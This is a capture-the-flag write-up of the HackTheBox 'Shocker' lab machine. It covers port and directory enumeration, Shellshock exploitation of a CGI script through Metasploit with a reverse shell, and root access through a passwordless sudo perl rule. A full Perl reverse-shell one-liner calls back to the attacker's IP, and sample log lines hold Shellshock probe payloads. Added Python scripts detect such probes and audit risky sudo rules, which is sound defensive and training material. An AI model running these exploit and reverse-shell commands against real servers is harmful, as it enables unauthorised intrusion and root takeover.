Shocker
Nmap Scan
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -p- -Pn shocker.htb -T5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:40 IST
Stats: 0:03:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 62.92% done; ETC: 20:45 (0:01:47 remaining)
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 310.35 seconds
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -p 80,2222 -A shocker.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-22 20:55 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4f8ade8f80477decf150d630a187e49 (RSA)
| 256 228fb197bf0f1708fc7e2c8fe9773a48 (ECDSA)
|_ 256 e6ac27a3b5a9f1123c34a55d5beb3de9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 160.27 ms 10.10.14.1
2 160.38 ms shocker.htb (10.10.10.56)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.61 seconds
Checking the website in a browser reveals nothing: there is just a picture, and nothing of interest in view-source.
Let us check for existing directories (if any) on the machine.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ dirb http://shocker.htb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jun 25 00:49:37 2023
URL_BASE: http://shocker.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
The first scan did not give much apart from one directory, /cgi-bin/. The cgi-bin directory is where the web server keeps the scripts it executes (via CGI) to handle certain requests.
Let us enumerate /cgi-bin/ further, changing a few options to get results. Since cgi-bin is known to hold scripts, we add -x pl,sh to try those extensions. Opening cgi-bin in the browser gives access denied, so we include 403 in the status codes that results are reported for.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ gobuster dir -u shocker.htb/cgi-bin/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt --threads 200 -s 200,204,301,303,307,403 -b "" -x sh,pl
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Status codes: 200,204,301,303,307,403
[+] User Agent: gobuster/3.5
[+] Extensions: sh,pl
[+] Timeout: 10s
===============================================================
2023/06/25 00:57:18 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]
The machine name, the shell script in cgi-bin, and Apache 2 all point to the Shellshock vulnerability (CVE-2014-6271): mod_cgi passes request headers to the script as environment variables, and a vulnerable bash executes commands appended to a function definition found in one of them. Let's check for Shellshock.
Nmap Shellshock Vulnerability Check.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=whoami shocker.htb
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-24 14:52 IST
Nmap scan report for shocker.htb (10.10.10.56)
Host is up (0.059s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.18 (Ubuntu) Server at shocker.htb Port 80</address>
| </body></html>
|
| References:
| http://seclists.org/oss-sec/2014/q3/685
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_ http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
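From the defender's side, the same signature Nmap just used is what to hunt for in the web server's access logs. The following is an added example (it is not from the original write-up) that parses Apache combined-format access log lines and flags requests whose User-Agent, Referer or request line carries the bash function-import prefix `() {`; it also notes a 500 on a CGI path, which is what the injected command produced in the Nmap check above. The log lines are constructed, modelled on the scan above, and the function names `scan_lines`, `parse_combined` and `is_shellshock_probe` are this example's own.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache combined-format access logs.

Added example for this write-up; not part of the original post. Apache mod_cgi
exports request headers to the CGI script as environment variables
(User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER, ...), and a vulnerable
bash executes whatever follows a function definition of the form "() { ... };"
in any environment variable. The "() {" prefix is therefore the thing to hunt
for in header fields of requests to CGI paths. All log lines below are constructed.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Apache escapes embedded quotes as \" so the quoted groups allow backslash escapes.
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# bash's function-import syntax: "()" then "{" with optional whitespace between.
_SHELLSHOCK = re.compile(r'\(\s*\)\s*\{')

SAMPLE_LOG = [
    # constructed: benign browse of the landing page
    '10.10.14.3 - - [24/Jun/2023:15:01:00 +0530] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # constructed: plain request for the CGI script, no probe in any field
    '10.10.14.2 - - [24/Jun/2023:14:52:09 +0530] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0 (Nmap Scripting Engine; https://nmap.org/book/nse.html)"',
    # constructed: probe in User-Agent; the 500 is the CGI header contract breaking
    '10.10.14.2 - - [24/Jun/2023:14:52:10 +0530] "GET /cgi-bin/user.sh HTTP/1.1" 500 613 "-" "() { :;}; whoami"',
    # constructed: same prefix carried in Referer, with extra whitespace
    '10.10.14.2 - - [24/Jun/2023:15:56:30 +0530] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "( ) { :; }; id" "curl/7.88.1"',
]


def is_shellshock_probe(value: str) -> bool:
    """True if a header or request value carries the bash function-definition prefix.
    Percent-encoding is undone first so an encoded prefix in the request line is caught."""
    return bool(_SHELLSHOCK.search(unquote(value)))


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = _COMBINED.match(line.strip())
    return m.groupdict() if m else None


def scan_lines(lines: List[str]) -> List[dict]:
    """One finding per log line whose request line, Referer or User-Agent carries a
    Shellshock probe. `cgi_error` marks a 500 on a CGI path: injected output breaks
    the CGI header contract, so it usually means the command ran, not that it was blocked."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # not combined format; a real deployment would count these
        hit_fields = [f for f in ("request", "referer", "ua") if is_shellshock_probe(rec[f])]
        if not hit_fields:
            continue
        parts = rec["request"].split(" ")
        path = parts[1] if len(parts) > 1 else rec["request"]
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "path": path,
            "status": int(rec["status"]),
            "fields": hit_fields,
            "cgi_error": path.startswith("/cgi-bin/") and rec["status"] == "500",
        })
    return findings


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(hit)
```

Running the block over the constructed lines reports two findings from 10.10.14.2, the first flagged as a CGI error. Feed it `cat /var/log/apache2/access.log` split into lines for a real check; the two benign lines show that a request merely touching `/cgi-bin/` is not enough to alert on, the `() {` prefix in a header is.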
We could exploit this with the Nmap script, but for an easier way around I will use Metasploit: I have selected the Shellshock module exploit/multi/http/apache_mod_cgi_bash_env_exec and set a payload.
msf6 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
1 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
2 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
.
.
<Redacted>
Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec
msf6 > use 1
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
.<REDACTED>
8 payload/linux/x86/exec normal No Linux Execute Command
9 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
10 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
11 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
12 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
.
.<REDACTED>
33 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
34 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload 33
payload => linux/x86/shell_reverse_tcp
Now show options, set RHOST, LHOST, LPORT and TARGETURI, and run (or exploit).
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (linux/x86/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST 192.168.1.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST shocker.htb
RHOST => shocker.htb
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/user.sh
targeturi => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set lhost tun0
lhost => 10.10.116.14
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.16.4:4444
[*] Command Stager progress - 100.00% done (817/817 bytes)
[*] Command shell session 1 opened (10.10.116.14:4444 -> 10.10.10.56:51908) at 2023-06-24 15:56:34 +0530
Now that we have a shell, let's upgrade to a PTY shell with Python and check the user directory for flags. With sudo -l we also see that we can run perl via sudo without a password.
whoami
shelly
python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.116.14";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'use Socket;$i="10.10.16.4";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Netcat listener
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.56] 59352
# whoami
root
#
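The (root) NOPASSWD: /usr/bin/perl rule is the misconfiguration that turns the web user's shell into root, since perl can exec any program. As an added example (not from the original write-up), the script below reads `sudo -l` output in the format shown above and reports passwordless rules that grant ALL or a shell-equivalent interpreter; it is the check an administrator would run before such a rule reaches a sudoers file. The sample output extends the box's own rule with constructed ones, and the function names and the interpreter list are this example's own.

```python
"""Audit `sudo -l` output for passwordless rules that hand out a shell.

Added example for this write-up; not part of the original post. A sudo rule that
allows an interpreter (perl, python, a shell, env, ...) without a password is
equivalent to granting a root shell when the runas user is root, because the
interpreter will exec whatever it is told to. The sample below is constructed
around the rule seen on Shocker.
"""
import re
from posixpath import basename
from typing import List

# Interpreters that run arbitrary code by design. Illustrative, not exhaustive.
SHELL_EQUIVALENT = {
    "perl", "python", "python2", "python3", "ruby", "node",
    "sh", "bash", "dash", "zsh", "ksh", "env",
}

# One rule as `sudo -l` prints it: (runas_user[: runas_group]) [TAG: ...] cmd1, cmd2, ...
_RULE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# constructed: the Shocker rule plus two extra rules to show what is and is not flagged
SAMPLE_SUDO_L = """\
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/apt-get update, /usr/bin/systemctl restart apache2
    (www-data) NOPASSWD: /usr/bin/python3
"""


def parse_sudo_l(text: str) -> List[dict]:
    """Return the rules (runas, tags, commands) listed after the 'may run' header."""
    rules = []
    in_rules = False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = _RULE.match(line)
        if not m:
            continue  # continuation or unexpected text; ignored in this example
        tags = re.findall(r"[A-Z_]+", m.group("tags"))
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": m.group("runas").strip(), "tags": tags, "commands": cmds})
    return rules


def risky_rules(text: str) -> List[dict]:
    """Passwordless rules that grant ALL or a shell-equivalent binary. `root_equivalent`
    is set when the runas user is root or ALL, i.e. the rule yields a root shell."""
    findings = []
    for rule in parse_sudo_l(text):
        if "NOPASSWD" not in rule["tags"]:
            continue
        runas_user = rule["runas"].split(":")[0].strip()
        for cmd in rule["commands"]:
            binary = cmd.split()[0]
            if cmd == "ALL" or basename(binary) in SHELL_EQUIVALENT:
                findings.append({
                    "runas": rule["runas"],
                    "command": cmd,
                    "reason": "ALL commands" if cmd == "ALL" else "shell-equivalent interpreter",
                    "root_equivalent": runas_user in ("root", "ALL"),
                })
    return findings


if __name__ == "__main__":
    for finding in risky_rules(SAMPLE_SUDO_L):
        print(finding)
```

On the constructed sample the perl rule is reported as root-equivalent and the python3 rule as a lesser finding (it only reaches www-data), while the password-protected apt-get/systemctl rule is left alone. The remedy on the box side is to drop the perl rule, or at least to restrict it to a fixed script path rather than the interpreter itself.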
Flags
shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ pwd
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ cd ~
cd ~
shelly@Shocker:/home/shelly$ pwd
pwd
/home/shelly
shelly@Shocker:/home/shelly$ ls
ls
user.txt
shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
20c64e46583e99a6aa565d829bd877a9
shelly@Shocker:/home/shelly$
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.10.116.14] from (UNKNOWN) [10.10.10.56] 59352
# whoami
root
# #root flag below
# cat /root/root.txt
95cfee3c46c56005159cabca155b33b1
# #user Flag below for Shocker
# #we should ideally be doing from shelly user
# cat /home/shelly/user.txt
20c64e46583e99a6aa565d829bd877a9